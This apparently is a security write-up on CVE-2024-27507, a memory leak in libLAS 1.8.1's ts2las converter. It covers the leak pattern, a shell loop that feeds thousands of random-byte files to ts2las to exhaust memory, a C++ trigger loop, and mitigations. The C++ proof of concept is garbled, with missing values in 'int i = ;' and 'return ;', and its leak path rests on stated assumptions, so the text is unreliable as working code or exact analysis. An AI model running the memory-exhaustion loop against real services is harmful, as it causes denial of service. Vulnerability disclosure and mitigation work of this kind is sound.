A serious memory leak has been identified in the LAS tools library, libLAS version 1.8.1, specifically in the /libLAS/apps/ts2las.cpp source file. This issue, tracked as CVE-2024-27507, can cause applications built using this library to unexpectedly consume more and more memory over time. It could lead to degraded performance, application crashes, or even denial-of-service (DoS) conditions.
In this article, we’ll explain what causes the vulnerability, provide easy-to-understand code snippets, show how it can be triggered, and discuss mitigation steps.
What is libLAS?
libLAS is a C++ library for reading and writing LAS format files, a standard for lidar point cloud data storage and delivery. It's used in GIS, mapping, and remote sensing industries.
Vulnerability Overview
- CVE ID: CVE-2024-27507
Affected Version: libLAS 1.8.1
- File: /libLAS/apps/ts2las.cpp
Where’s the Leak?
In ts2las.cpp, memory is dynamically allocated inside a loop or within a function, but the corresponding delete or free isn’t always called, especially on error conditions or during repeated processing.
Here’s a simplified version of the vulnerable pattern inside ts2las.cpp
char* buffer = new char[BUFFER_SIZE];
// ... do some work ...
if (error_condition) {
return false; // Oops! 'buffer' is never freed
}
// ... eventually ...
delete[] buffer;
If error_condition triggers—even just once—the buffer pointer is not deallocated, causing a memory leak.
This pattern repeats inside loop iterations or function calls, and when files are large or many files are processed, the memory consumption grows rapidly.
How can it be exploited?
An attacker or even an accidental user causes a function to trigger its error state repeatedly (for example, by feeding malformed or corrupted files). Each error leaks memory that the application never reclaims.
Exploit Scenario
Assuming a tool built on libLAS to convert files (e.g., ts2las converter), a simple batch of corrupted files can cause persistent memory leaks:
for i in $(seq 1 10000); do
cat /dev/urandom | head -c 1024 > junk$i.las
ts2las junk$i.las output.las
done
After just a few thousand iterations, the ts2las process can consume gigabytes of RAM, potentially crashing the system or making it completely unresponsive.
Here’s a minimal C++ snippet that triggers the vulnerable flow
#include "liblas/liblas.hpp"
int main() {
for (int i = ; i < 100000; ++i) {
std::ifstream ifs("corrupted.las", std::ios::binary);
liblas::ReaderFactory f;
liblas::Reader reader = f.CreateWithStream(ifs);
// Assuming the constructor or reading triggers memory allocation
// and fails (like buffer allocation on an invalid file), memory is leaked
if (!reader) {
continue; // Memory allocated internally may never be freed
}
}
return ;
}
This code will gradually eat up system memory as the leak is repeatedly triggered by processing a bad file.
Solution & Mitigation
- Patch: No official patch at the time of writing (2024-06). Check the libLAS GitHub repository for updates or pull requests addressing the leak.
- Workaround: If you maintain a fork or your application, carefully audit dynamic memory allocations, especially in error/exit paths. Always delete or free any allocated memory before returning on error!
- Update: Consider alternate or actively maintained libraries for LAZ/LAS processing.
- Monitor: Deploy resource limits or monitor your application's memory usage if you must use libLAS 1.8.1.
Example of Safe Pattern
char* buffer = new char[BUFFER_SIZE];
// ... do some work ...
if (error_condition) {
delete[] buffer;
return false;
}
// ... eventually ...
delete[] buffer;
Or better yet, use a smart pointer
#include <memory>
std::unique_ptr<char[]> buffer(new char[BUFFER_SIZE]);
// automatic deallocation on all control paths
References
- Official CVE entry
- libLAS GitHub
- LAS Specification
Conclusion
CVE-2024-27507 is not a flashy remote-code execution bug, but it can make your mapping tools unstable or take down your servers. Memory leaks are often overlooked—but in critical software, even "small" bugs matter.
If you use libLAS in production or for heavy data processing, audit your code and consider contributing a fix upstream!
*Author: Your friendly security researcher — exclusive writeup for stackexchange*
Timeline
Published on: 02/27/2024 15:15:07 UTC
Last modified on: 08/29/2024 20:36:27 UTC